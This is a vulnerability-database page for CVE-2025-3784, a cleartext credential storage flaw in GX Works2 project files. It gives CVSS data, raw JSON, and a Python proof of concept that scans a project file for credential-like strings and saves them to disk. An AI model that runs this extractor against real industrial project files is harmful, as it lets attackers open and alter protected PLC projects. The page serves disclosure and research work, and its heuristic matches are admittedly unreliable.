Security Vulnerability Report
CVE-2025-3784 CVSS 5.5 MEDIUM

CVE-2025-3784

Published: 2025-11-27 05:16:15
Last Modified: 2026-04-15 00:35:42

Description

Cleartext Storage of Sensitive Information Vulnerability in GX Works2 all versions allows an attacker to disclose credential information stored in plaintext from project files. As a result, the attacker may be able to open project files protected by user authentication using disclosed credential information, and obtain or modify project information.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GX Works2: all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
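#!/usr/bin/env python3
"""
CVE-2025-3784 PoC - GX Works2 Project File Credential Extraction

Scans a GX Works2 project file for printable strings that follow
credential-like keywords (CWE-312, cleartext storage of sensitive
information).

Note: This is for educational and authorized security testing purposes only.

Review notes:
- The keyword patterns below are generic heuristics. Nothing here parses the
  real project file layout, so every hit is only a candidate that has to be
  confirmed by hand; false positives are expected, especially for the
  ``user`` and ``auth`` keywords.
- The results file holds whatever was recovered in cleartext. It is created
  with owner-only permissions and should be handled, and deleted, with the
  same care as the credentials themselves.
"""
import binascii
import datetime
import os
import re
import sys

# Keyword heuristics: a credential-like word, a separator, then a run of
# printable ASCII. Kept as raw bytes because the project file is read as binary.
_CREDENTIAL_PATTERNS = (
    rb'password\s*[=: ]\s*([\x20-\x7e]+)',    # password=xxx
    rb'pwd\s*[=: ]\s*([\x20-\x7e]+)',         # pwd=xxx
    rb'pass\s*[=: ]\s*([\x20-\x7e]+)',        # pass=xxx
    rb'user\s*[=: ]\s*([\x20-\x7e]+)',        # user=xxx
    rb'auth\s*[=: ]\s*([\x20-\x7e]+)',        # auth=xxx
    rb'credential\s*[=: ]\s*([\x20-\x7e]+)',  # credential=xxx
)

# Captured values that are configuration literals rather than secrets.
_IGNORED_VALUES = frozenset({'null', 'none', 'false', 'true'})


def extract_plaintext_credentials(file_path):
    """
    Report credential-like strings found in a GX Works2 project file.

    Each match is printed with its pattern, value and file offset, and all
    matches are written to ``<file stem>_credentials.txt`` next to the input.
    That results file is created even when nothing matched.

    Args:
        file_path: Path of the project file to scan.

    Returns:
        None. A missing file or an I/O failure is reported on stdout and the
        function returns without raising.
    """
    print(f"[*] Analyzing file: {file_path}")

    if not os.path.exists(file_path):
        print(f"[-] Error: File not found: {file_path}")
        return

    try:
        with open(file_path, 'rb') as f:
            data = f.read()

        print(f"[+] File size: {len(data)} bytes")
        print("\n[*] Searching for plaintext credentials...")

        findings = []
        for pattern in _CREDENTIAL_PATTERNS:
            for match in re.finditer(pattern, data, re.IGNORECASE):
                value = match.group(1).decode('utf-8', errors='ignore')
                # Filter out common false positives
                if len(value) >= 3 and value.lower() not in _IGNORED_VALUES:
                    findings.append({
                        'pattern': pattern.decode('utf-8', errors='ignore'),
                        'value': value,
                        'offset': match.start(),
                    })

        # The former unfiltered scan for every 8-64 character ASCII run was
        # removed: its result was never read.

        print(f"\n[+] Found {len(findings)} potential credential matches")

        if findings:
            print("\n=== Extracted Credentials ===")
            for i, finding in enumerate(findings, 1):
                print(f"\n[{i}] Pattern: {finding['pattern']}")
                print(f" Value: {finding['value']}")
                print(f" Offset: 0x{finding['offset']:x}")

        # Save findings to file. The report repeats the cleartext values, so
        # it is opened owner-only instead of with the process default umask.
        output_file = f"{os.path.splitext(file_path)[0]}_credentials.txt"
        fd = os.open(output_file, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, 'w') as f:
            # A report left over from an earlier run keeps its old mode on
            # open(); tighten it before any value is written.
            os.chmod(output_file, 0o600)
            f.write("CVE-2025-3784 - GX Works2 Credential Extraction Results\n")
            f.write(f"Target File: {file_path}\n")
            f.write(f"Analysis Date: {datetime.datetime.now()}\n\n")
            for i, finding in enumerate(findings, 1):
                f.write(f"\n[{i}] {finding['pattern']} = {finding['value']}\n")

        print(f"\n[+] Results saved to: {output_file}")

    except OSError as e:
        # Only file access can fail here; report it and keep the CLI quiet.
        print(f"[-] Error during analysis: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-3784_poc.py <project_file>")
        print("Example: python cve-2025-3784_poc.py sample.gx2")
    else:
        extract_plaintext_credentials(sys.argv[1])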

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3784", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:15.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information Vulnerability in GX Works2 all versions allows an attacker to disclose credential information stored in plaintext from project files. As a result, the attacker may be able to open project files protected by user authentication using disclosed credential information, and obtain or modify project information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU95288056/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-01", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-016_en.pdf", "source": "[email protected]"}]}}